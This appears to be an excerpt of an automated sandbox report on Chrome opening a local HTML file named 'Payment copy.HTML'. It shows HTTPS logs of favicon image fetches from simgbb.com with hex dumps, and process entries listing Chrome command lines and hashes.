                                              3192.168.2.449748172.67.131.2514437580C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2025-04-02 22:54:19 UTC621OUTGET /images/favicon.png HTTP/1.1
                                              Host: simgbb.com
                                              Connection: keep-alive
                                              sec-ch-ua-platform: "Windows"
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                              sec-ch-ua-mobile: ?0
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Sec-Fetch-Storage-Access: active
                                              Referer: https://i.ibb.co/
                                              Accept-Encoding: gzip, deflate, br, zstd
                                              Accept-Language: en-US,en;q=0.9
                                              2025-04-02 22:54:19 UTC896INHTTP/1.1 200 OK
                                              Date: Wed, 02 Apr 2025 22:54:19 GMT
                                              Content-Type: image/png
                                              Content-Length: 7235
                                              Connection: close
                                              last-modified: Tue, 09 Apr 2024 09:36:03 GMT
                                              etag: "66150c03-1c43"
                                              Cache-Control: max-age=31536000
                                              CF-Cache-Status: HIT
                                              Age: 6742
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAluWC3eeAE%2F9Rjg8X3eylp52UiKF9ki8xR8bTDRu%2F%2BlzwRa9CDrYZdtrhdBFozYAT3lXqCz7AN%2Bs25Zz6L%2FkOw6jCPE69YaTZlXjTu3GA8i4T%2FK0zuxymb98PFz"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 92a3e84dbf713448-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=97373&min_rtt=96182&rtt_var=22080&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1193&delivery_rate=37335&cwnd=246&unsent_bytes=0&cid=ebe061df00bcc6f2&ts=256&x=0"
                                              2025-04-02 22:54:19 UTC473INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 06 00 00 00 79 7d 8e 75 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 07 74 49 4d 45 07 e0 03 0e 14 38 02 9f 51 6a ba 00 00 1b d0 49 44 41 54 78 da ed 9d 79 90 1c d5 7d c7 bf 3d 3d f7 cc ce ec cc 6a 4f 69 25 21 81 84 ae 95 38 c4 61 10 b2 65 97 71 41 ca b1 71 25 26 d8 15 db 40 e1 38 d8 71 8c 8b c4 f1 51 b1 71 95 e3 d8 40 ca 89 83 03 06 93 04 6c a4 10 a7 f0 6d 07 db 18 90 c5 61 8c 8e d5 b5 92 76 b5 42 48 ab dd d5 ce ce ce 7d f4 91 3f 84 5c 84 43 da 99 9d d7 af df cc f7 f3 17 45 c1 cc f4 7e fb 7d fa f5 3b 7e 4f 5b ba 79 d4 06 21 84 28 80 87 7f 02 42 08 85 45 08 21 14 16 21 84 c2 22 84 10 0a 8b 10 42 28 2c
                                              Data Ascii: PNGIHDR,,y}ubKGDpHYs+tIME8QjIDATxy}==jOi%!8aeqAq%&@8qQq@lmavBH}?\CE~};~O[y!(BE!!"B(,
                                              2025-04-02 22:54:19 UTC1369INData Raw: 08 21 14 16 21 84 c2 22 84 10 0a 8b 10 42 28 2c 42 48 4b e1 6d d6 0b 4b fa 35 6c e8 0d 61 fd bc 20 96 c6 bc 98 1f f1 22 e2 f5 40 d7 80 a2 69 e3 64 c9 c4 68 ce c0 ce a9 32 9e 1d 2f 61 77 ba ca bb 81 10 97 a3 2d dd 3c 6a 37 d3 05 ad 9f e7 c7 2d 2b e2 d8 d0 1d 84 57 9f 7d 07 f2 48 b6 8a 47 86 b3 f8 de a1 2c 0a 26 6f 0c 42 28 2c 81 2c 08 eb b8 e3 e2 24 ae ea 0d cf e9 73 a6 4b 06 ee 1a 4c 63 cb 48 0e 36 34 de 21 af a2 cd ab 21 6b d8 fc 43 30 0b 0a 6b 2e 5c db 1f c6 57 d6 27 11 f1 e9 0d fb cc ad 27 8a b8 ed 99 49 a4 2a ad 73 53 e8 b0 b1 20 e2 45 7f d4 8b 85 51 1f 16 45 5f f9 e7 57 fe dd 73 13 65 dc b2 75 92 b6 60 16 d2 50 7e 0c eb 2f 57 c4 70 db 40 a2 e1 9f 7b 65 4f 08 8f bd b3 17 1f 7e 72 02 23 59 a3 69 02 8f 7a 81 85 51 1f 16 46 bd e8 8f 78 b1 e8 f4 3f 47 bd
                                              Data Ascii: !!"B(,BHKmK5la "@idh2/aw-<j7-+W}HG,&oB(,,$sKLcH64!!kC0k.\W''I*sS EQE_Wseu`P~/Wp@{eO~r#YizQFx?G
                                              2025-04-02 22:54:19 UTC1369INData Raw: 80 07 38 4f 62 55 00 cb b2 38 c8 cb 2c 28 2c 32 3b 56 27 fc f0 e9 f2 22 19 ce 1a c8 9b cc 81 59 50 58 64 56 af 20 92 07 79 f9 44 67 16 14 16 99 2d b2 07 79 77 70 56 8a 59 50 58 64 d6 4f 75 d6 5d 62 16 cc 82 c2 52 81 a4 5f c3 fc a8 bc 41 de 92 61 61 7f 9a 8d 84 59 50 58 44 81 57 90 bd d3 95 57 b6 25 11 66 e1 5e bc fc 13 b0 91 00 73 ab 6a 19 d1 81 a8 cf 83 80 ae a1 64 da 28 18 16 f2 86 ad 6c 59 14 66 41 61 d5 cc cd cb db 10 f2 ca eb 00 3e 72 28 8b 93 0e 56 fe 1f 90 be aa 7a 76 af 20 f3 c3 3a 2e ef 0e e2 82 8e 00 56 25 fc 58 18 f1 22 16 78 fd 7e 3b d3 b2 30 56 30 71 38 5b c5 48 d6 c0 73 13 25 3c 33 5e 42 d6 70 ff e9 c5 cc 82 c2 aa 89 b8 4f c3 67 d6 25 a5 7d bf 69 59 b8 df a1 e3 bc 00 00 b6 8d 01 c9 55 01 ce b4 0d 64 41 58 c7 75 e7 44 71 f5 82 10 96 b7 cf ae
                                              Data Ascii: 8ObU8,(,2;V'"YPXdV yDg-ywpVYPXdOu]bR_AaaYPXDWW%f^sjd(lYfAa>r(Vzv :.V%X"x~;0V0q8[Hs%<3^BpOg%}iYUdAXuDq
                                              2025-04-02 22:54:19 UTC1369INData Raw: 4d c3 8b 27 c5 7d cf 82 06 35 12 66 e1 9e 2c 94 10 96 57 b3 a5 2e da 03 9c df 92 d3 2a 67 2e 8a 1c 9b e9 0e e9 cc a2 c9 b2 50 42 58 2b da fd 52 17 ed 9d 2c 1a 38 ee 60 49 e4 7e c9 67 2e 9e 28 54 1d db b0 7a 48 e0 44 46 23 26 69 98 85 7b b2 50 46 58 d2 2b 34 b4 58 49 e4 9d 0e 2e 90 1d 16 d8 48 12 0d 38 0d 81 59 b8 27 0b 75 84 95 6c ad 05 a3 b2 c7 eb b6 3b 38 5e 77 a2 28 6e a0 37 de 10 61 31 0b b7 64 a1 50 0f 4b ee 4d e3 78 0d ac 26 5e 55 fd 5a 52 65 0b 96 25 e6 95 a7 cd e7 61 16 4d 94 85 12 c2 8a 7a 35 2c 8e ca 2d c7 e5 e4 80 bb 0e 5b ca 66 d1 d3 18 a6 e5 e8 a9 40 36 34 a4 2b 62 1a 89 5f d7 98 45 93 64 a1 8c b0 06 92 7e 78 3c f2 3a 78 a3 d9 0a 32 55 e7 ca 63 ac 68 f7 23 28 71 82 e1 60 a6 0a a7 0b 44 4e 0b 2a 81 31 d7 87 3a b3 70 4f 16 ca 08 4b fe eb 20 07
                                              Data Ascii: M'}5f,W.*g.PBX+R,8`I~g.(TzHDF#&i{PFX+4XI.H8Y'ul;8^w(n7a1dPKMx&^UZRe%aMz5,-[f@64+b_Ed~x<:x2Uch#(q`DN*1:pOK
                                              2025-04-02 22:54:19 UTC1369INData Raw: 65 49 79 0d f9 e0 79 e2 9e e8 bf 3a 56 40 a6 ce 4d a0 cc c2 3d 59 28 21 ac a4 5f 43 6f 44 de a0 a7 69 59 18 74 f0 29 f7 af 6f 99 87 3e 89 d7 7b 38 eb 6c 45 55 e0 d4 f6 8f 6b fa c5 cd 48 3d 5a e7 2b 48 47 40 63 16 2e c9 42 19 61 ad 92 bc 1d 67 24 6b 20 ef d0 24 8d 0e 1b 57 0b bc 59 dc fa 0a 72 fd d2 a8 b0 5d 0c c7 f3 55 fc 76 bc be 0d b6 6b 92 01 66 e1 92 2c 94 11 d6 8a 84 ec d7 41 e7 6e 9a 0d 02 a7 91 67 8b d3 55 2d 83 1e e0 c6 e5 31 61 9f bf 79 38 07 bb ce 23 a4 64 0b 8b 59 a8 d8 c3 6a 97 bc 68 cf c1 19 c2 3f 5a 18 91 1e a4 d3 63 26 1f 38 b7 0d 1d 82 8a 32 e6 ab 26 1e 3e 94 ad fb ff 5f 29 f1 48 7a 66 a1 a8 b0 ce 8b 4b de 43 e8 50 b7 3c e9 d7 70 f5 7c b9 3d ac 92 61 61 28 ed ec 11 66 1f 5d 21 ee 89 fe e8 48 7e 4e 03 bc e7 48 3c 4e 8e 59 28 28 2c 0d 36 16
                                              Data Ascii: eIyy:V@M=Y(!_CoDiYt)o>{8lEUkH=Z+HG@c.Bag$k $WYr]Uvkf,AngU-1ay8#dYjh?Zc&82&>_)HzfKCP<p|=aa(f]!H~NH<NY((,6
                                              2025-04-02 22:54:19 UTC1286INData Raw: 89 bf d8 3a 89 f4 6b aa 42 6c 19 c9 b1 55 bc 8a 9f 1d cd e3 93 db 26 a5 1c 11 c5 2c dc 93 85 12 c2 7a 6a ac 08 cb b2 9a 2e f8 b2 61 e1 63 bf 9d c4 de f4 eb 5f 79 9f 99 28 63 28 5d 66 eb 00 f0 d8 68 0e 7f b5 6d d2 d1 03 19 98 85 3b b3 50 42 58 93 65 0b db 26 9a eb 86 31 2d 0b b7 3f 7f 12 cf 9c e1 ba ee dd 97 69 f9 06 b2 65 38 8b db 9f 3b 29 fd 69 ce 2c dc 93 85 eb 85 05 00 9b 87 b3 4d 13 bc 69 59 f8 fc 0b a9 b3 ce ae fc f0 48 1e 3b a7 5a 73 96 ca b4 2c dc b5 2b 85 cf bd 90 72 45 03 61 16 ee c9 42 09 61 3d fe 72 01 47 b2 ea cf 16 56 4c 0b b7 3d 3b 85 47 0f e7 cf fe 1f 6b 1a ee 78 31 05 b3 09 5f 87 cf 44 a6 62 e2 a3 5b 27 f1 ad 7d 2e 7a 48 31 8b a6 bb 36 a1 c2 32 a1 e1 ee c1 b4 d2 7f a0 62 f5 d4 00 fb 4f 8e ce 7e bf d5 ce 54 15 f7 ec 6d 9d d7 91 91 4c 05 ef
                                              Data Ascii: :kBlU&,zj.ac_y(c(]fhm;PBXe&1-?ie8;)i,MiYH;Zs,+rEaBa=rGVL=;Gkx1_Db['}.zH162bO~TmL


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449749172.67.131.2514437580C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2025-04-02 22:54:20 UTC392OUTGET /images/favicon.png HTTP/1.1
                                              Host: simgbb.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Sec-Fetch-Storage-Access: active
                                              Accept-Encoding: gzip, deflate, br, zstd
                                              Accept-Language: en-US,en;q=0.9
                                              2025-04-02 22:54:20 UTC359INHTTP/1.1 200 OK
                                              Date: Wed, 02 Apr 2025 22:54:20 GMT
                                              Content-Type: image/png
                                              Content-Length: 7235
                                              Connection: close
                                              Server: cloudflare
                                              Accept-Ranges: bytes
                                              Last-Modified: Tue, 09 Apr 2024 09:36:03 GMT
                                              Etag: "66150c03-1c43"
                                              Cache-Control: max-age=31536000
                                              Cf-Cache-Status: HIT
                                              Age: 6743
                                              CF-RAY: 92a3e8513e10440b-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2025-04-02 22:54:20 UTC1010INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 06 00 00 00 79 7d 8e 75 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 07 74 49 4d 45 07 e0 03 0e 14 38 02 9f 51 6a ba 00 00 1b d0 49 44 41 54 78 da ed 9d 79 90 1c d5 7d c7 bf 3d 3d f7 cc ce ec cc 6a 4f 69 25 21 81 84 ae 95 38 c4 61 10 b2 65 97 71 41 ca b1 71 25 26 d8 15 db 40 e1 38 d8 71 8c 8b c4 f1 51 b1 71 95 e3 d8 40 ca 89 83 03 06 93 04 6c a4 10 a7 f0 6d 07 db 18 90 c5 61 8c 8e d5 b5 92 76 b5 42 48 ab dd d5 ce ce ce 7d f4 91 3f 84 5c 84 43 da 99 9d d7 af df cc f7 f3 17 45 c1 cc f4 7e fb 7d fa f5 3b 7e 4f 5b ba 79 d4 06 21 84 28 80 87 7f 02 42 08 85 45 08 21 14 16 21 84 c2 22 84 10 0a 8b 10 42 28 2c
                                              Data Ascii: PNGIHDR,,y}ubKGDpHYs+tIME8QjIDATxy}==jOi%!8aeqAq%&@8qQq@lmavBH}?\CE~};~O[y!(BE!!"B(,
                                              2025-04-02 22:54:20 UTC1369INData Raw: c3 fb 97 44 e1 d5 9c 1d 3f 88 e8 c0 92 36 79 c3 8d 65 c3 c2 3e 6e 5d 62 16 14 56 6d 5c bb 30 22 fd 37 b4 07 74 5c d9 13 72 f4 3b 07 3a 02 d0 3d f2 a2 da 3f 53 01 c7 db 99 05 85 55 23 6f e9 0e ba e2 77 5c e1 f0 ef 18 48 ca ed 55 ee 9a e2 80 3b b3 a0 b0 6a a2 33 e0 41 5f c4 e7 8a df 72 81 c3 63 18 b2 07 79 b9 c2 9d 59 50 58 35 b2 b8 cd eb a2 df e2 ac 38 07 92 1c e4 75 4f 0f 8b 59 50 58 b3 a0 2b e4 1e 61 b5 07 74 f8 1c 5a dd d0 13 f4 a0 3b 2c ef da 67 ca 26 46 9b 68 2f 25 b3 a0 b0 1c 21 ec d5 5a f2 f7 c8 9e 42 df 95 2a 03 1a cb ec 30 0b 0a ab 26 4c bb 35 7f 8f f4 45 8a 5c e1 ce 2c 28 ac da c9 57 2d d7 fc 16 cb b2 50 30 9c f9 3d 03 1d 72 67 a5 38 7e c5 2c 28 ac 3a 18 2b b8 e7 dd 7d bc 68 c2 72 60 13 b4 06 1b ab 13 72 1b c9 4e 36 12 66 41 61 d5 ce 48 b6 0a cb
                                              Data Ascii: D?6ye>n]bVm\0"7t\r;:=?SU#ow\HU;j3A_rcyYPX58uOYPX+atZ;,g&Fh/%!ZB*0&L5E\,(W-P0=rg8~,(:+}hr`rN6fAaH
                                              2025-04-02 22:54:20 UTC1369INData Raw: 49 a9 0d e4 34 97 76 85 f0 e0 c6 6e 84 25 0d 21 31 0b f7 64 a1 8c b0 64 77 c9 f7 a6 ab 8e 1d 47 0f 00 ab 12 7e f8 75 ae df 3d cd c5 9d 41 7c eb ca 2e 68 70 7e f4 97 59 b8 27 0b 65 84 25 fd 75 d0 f1 f1 2b 3f 5b c6 6b b8 a2 27 84 db 07 12 12 1e 96 cc c2 2d 59 b0 87 35 4b 9c de 74 2a fb 7a dd ca 2d 2b e2 d8 d8 13 64 16 2d 9a 85 12 c2 f2 c0 c6 ca 76 b9 63 08 4e 0f b8 af 4d b2 91 bc 19 5f bc 28 09 bf 87 59 b4 62 16 4a 08 6b 59 dc 87 b0 4f de 28 5f ea 8d 16 ed 09 a4 dd a7 61 61 9b 8f ad e1 4d e8 8f fa 70 eb ca 38 b3 68 b1 2c 94 11 96 ec 29 e5 c1 14 5f 07 dd c6 8d cb da 90 f0 6b cc a2 85 b2 50 46 58 b2 cf 81 73 fa 94 92 75 6c 24 67 25 e4 d3 f1 e1 65 31 66 d1 42 59 28 23 2c e9 c7 2a 4d 71 86 d0 8d 7c f0 dc 36 e1 eb 81 98 85 7b b2 38 13 ae 59 e9 1e f4 00 4b 25 8f
                                              Data Ascii: I4vn%!1ddwG~u=A|.hp~Y'e%u+?[k'-Y5Kt*z-+d-vcNM_(YbJkYO(_aaMp8h,)_kPFXsul$g%e1fBY(#,*Mq|6{8YK%
                                              2025-04-02 22:54:20 UTC1369INData Raw: 05 a3 2d 56 12 59 d2 20 6f 87 c0 3a 49 93 45 93 59 28 9e 85 32 c2 1a 68 b1 a7 dc da 16 a8 1b fe 86 8d 24 28 b0 91 d4 db c3 62 16 ec 61 d5 82 df 03 2c 8b fb a4 de 34 4e 0e b8 7b 60 63 55 bb bc eb 75 7a 81 ec ab 11 59 eb bb 9e a7 3a b3 60 0f ab 66 56 27 fc f0 e9 f2 16 ed 4d 14 0c 9c 70 70 9b fc f2 b8 0f 21 9f bc 09 86 a1 99 2a 2a 96 9c ef 5e 2c 70 35 f9 44 1d 4f 75 66 e1 9e 2c 94 11 96 f4 0a 0d a9 d6 7a 1d dc 2e 69 90 17 00 16 45 c5 f4 66 0c d3 c2 c9 3a 1a 09 b3 70 4f 16 ea 08 ab e5 2a 34 b4 d6 8a fe ff df 48 c4 3c d5 8f e6 8d ba 0e 1f 65 16 ee c9 42 19 61 c9 ae d0 b0 b3 d5 2a 34 48 6c 24 cb 05 8d 55 d6 7b 02 0c b3 70 4f 16 4a 08 ab dd a7 61 61 9b bc 41 4f cb b2 1c 3d 25 27 a2 03 4b 63 f2 16 29 ce 94 4d 8c 66 0d 29 df dd 17 d6 91 10 74 84 56 3d 8d 84 59 b8
                                              Data Ascii: -VY o:IEY(2h$(ba,4N{`cUuzY:`fV'Mpp!**^,p5DOuf,z.iEf:pO*4H<eBa*4Hl$U{pOJaaAO=%'Kc)Mf)tV=Y
                                              2025-04-02 22:54:20 UTC1369INData Raw: d8 ab 31 0b 97 64 a1 8c b0 12 01 b9 c2 ca 09 9c 86 5d 97 f4 e3 b6 35 ed ae 0a 51 f4 df 7b 43 77 00 1f 12 b8 4f 2d 53 31 f1 cd 3d e9 86 7c 56 40 d7 98 85 4b b2 50 46 58 21 c9 37 8d 69 8b 11 56 7f 58 c7 bd 1b 3a 5d f3 2a 78 9a d5 02 37 fa f6 04 3d b8 f3 b2 79 f0 08 ac 6b f6 ed fd 33 98 ae 34 26 b3 80 47 63 16 2e c9 42 19 61 05 25 0b ab dd df f8 cb 8a fb 34 3c b0 b1 4b d8 8a e2 b9 70 51 87 1f 3e 01 7f f2 a0 07 b8 77 83 d8 6b 3e 96 ab e2 3b 43 8d 5b 49 6d d8 cc c2 2d 59 28 23 2c bf 64 61 9d df e0 6d 41 71 9f 86 07 37 76 09 1d 37 98 53 8f d6 a7 e3 ba 73 1a bb 3d c8 ab d9 b8 e7 ca 4e ac 12 bc 2f ef 0b bf 4f a1 91 45 61 4b a6 c5 2c 5c 92 85 32 c2 32 2c b9 8f b9 2b ba 83 f0 37 c8 99 0b c2 3a 1e d9 d4 83 81 8e a0 ab 83 bc 75 65 1c 8d 9a 9c f5 7b 80 7b ae e8 c2 55
                                              Data Ascii: 1d]5Q{CwO-S1=|V@KPFX!7iVX:]*x7=yk34&Gc.Ba%4<KpQ>wk>;C[Im-Y(#,damAq7v7Ss=N/OEaK,\22,+7:ue{{U
                                              2025-04-02 22:54:20 UTC749INData Raw: 79 dc 8b 6f be a5 13 e7 48 3e 85 26 5f 35 f1 1f 07 b2 b8 6f 7f 06 39 87 ce 87 ba a6 3f 84 2f 5d 98 44 c2 85 c7 85 bd 96 67 c6 8b b8 6f df 0c 9e 1e 6f ce d7 0d 66 41 61 cd 9a a0 07 f8 ec 05 09 5c bf 24 2a f4 60 c8 37 62 bc 60 e0 bf 46 72 78 e8 60 06 29 09 b5 ac 13 7e 0d 1f 5f d5 8e eb 97 44 11 70 59 29 e6 92 61 e1 7f 5f 2e e0 3b 43 19 ec 4e 37 7f c5 0d 66 41 61 d5 c4 ea 84 0f 5f b8 20 29 bc d8 fe e9 32 c9 5b 46 72 78 fc e5 82 2b f6 55 cd 0f eb b8 69 79 0c ef 59 14 41 4c e2 0c 6a c9 38 f5 b7 f9 c5 cb 05 fc ec 68 1e 39 a3 f5 1a 02 b3 a0 b0 6a e2 92 ce 00 6e 5c de 86 8d 3d 21 f8 f4 c6 3c e9 d2 65 13 bf 3d 51 c4 2f 8f 17 f1 c4 f1 a2 63 af 7d f5 f4 36 af 59 18 c1 d5 0b c2 b8 bc 2b 20 bc 1e 79 c9 b0 b0 37 5d c1 0b 93 65 3c 37 51 c2 73 13 25 94 2c 36 06 66 41 61
                                              Data Ascii: yoH>&_5o9?/]DgoofAa\$*`7b`Frx`)~_DpY)a_.;CN7fAa_ )2[Frx+UiyYALj8h9jn\=!<e=Q/c}6Y+ y7]e<7Qs%,6fAa


                                              050100150200s020406080100

                                              Click to jump to process

                                              050100150200s0.0050100MB

                                              Click to jump to process

                                              Target ID:0
                                              Start time:18:53:50
                                              Start date:02/04/2025
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                              Imagebase:0x7ff786830000
                                              File size:3'388'000 bytes
                                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:1
                                              Start time:18:53:50
                                              Start date:02/04/2025
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2056,i,7512422396215173747,8855882059684338427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2096 /prefetch:3
                                              Imagebase:0x7ff786830000
                                              File size:3'388'000 bytes
                                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:3
                                              Start time:18:53:56
                                              Start date:02/04/2025
                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Payment copy.HTML"
                                              Imagebase:0x7ff786830000
                                              File size:3'388'000 bytes
                                              MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true
                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                              There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                              No disassembly